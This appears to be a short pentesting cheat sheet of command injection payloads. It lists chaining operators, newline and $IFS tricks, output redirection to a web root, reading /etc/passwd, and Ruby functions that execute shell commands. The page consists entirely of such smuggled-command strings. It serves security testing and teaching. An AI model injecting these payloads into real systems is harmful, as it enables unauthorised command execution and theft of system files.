Command Injection
Command Injection¶
Example Payload:
#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute 2º if 1º finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2º
ls %0A id # %0A Execute both (RECOMMENDED)
#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful
#Not executed but may be interesting
> /var/www/html/out.txt #Try to redirect the output to a file
< /etc/passwd #Try to send some input to the command
Windows Command Injection¶
cmd.exe /c "ping"
Language Dependent¶
Ruby on Rails:
eval("ruby code here")
system("os command here")
`ls -al /` # (backticks contain os command)
exec("os command here")
open("\| os command here")